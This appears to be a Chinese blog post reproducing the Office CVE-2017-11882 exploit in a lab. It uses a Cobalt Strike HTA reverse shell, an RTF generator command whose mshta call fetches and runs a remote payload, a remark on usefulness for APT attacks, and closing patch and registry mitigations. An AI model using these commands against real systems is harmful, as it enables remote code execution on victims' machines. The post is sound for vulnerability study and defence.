本文記錄一下針對CVE-2017-11882的漏洞復現
0x00 前言
參考backlion師傅的PDF,記錄一下這個過程。
2017年11月14日,微軟發布了11月份的安全補丁更新,其中比較引人關注的莫過於悄然修復了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞為Office內存破壞漏洞,影響目前流行的所有Office版本。攻擊者可以利用漏洞以當前登錄的用戶的身份執行任意命令。 由於漏洞影響面較廣,漏洞披露后,金睛安全研究團隊持續對漏洞相關攻擊事件進行關注。11月19日,監控到了已有漏洞POC在網上流傳,隨即迅速對相關樣本進行了分析。目前該樣本全球僅微軟殺毒可以檢測。
- 漏洞影響版本:
- Office 365
- Microsoft Office 2000
- Microsoft Office 2003
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2016
0x01 環境清單
- WindowsServer 2008 (192.168.3.114)
- Office 2007
- MAC OSX(192.168.3.106)
0X02 復現過程
使用Cobalt Strike生成hta反彈shell
將生成的hta文檔放入WebServer根目錄:http://192.168.3.106/evil.hta
我(Cobalt Strike)本地監聽了一個8081端口,用來接收客戶端的Shell
要生成一個rtf/doc文檔,github上已有生成腳本
webdav_exec_CVE-2017-11882.py -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py
生成rtf文檔:
python webdav_exec_CVE-2017-11882.py -u http://192.168.3.106/evil.hta -e "mshta http://192.168.3.106/evil.hta" -o test.rtf
!!! Completed !!!
最后將test.rtf在目標機器上執行 =_=||,其實可以實戰的,對於APT的幫助很大
結果
目標機器上執行后,我們可以在Cobalt Strike看到來自客戶端的會話
0x03 修復建議
1、微軟已經對此漏洞做出了修復。
- 下載
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882更新補丁進行修補 - 開啟Windows Update功能,定期對系統進行自動更新
2、由於該公式編輯器已經17年未做更新,可能存在大量安全漏洞,建議在注冊表中取消該模塊的注冊。
- 按下Win R組合鍵,打開cmd.exe
- 輸入以下兩條命令:
reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400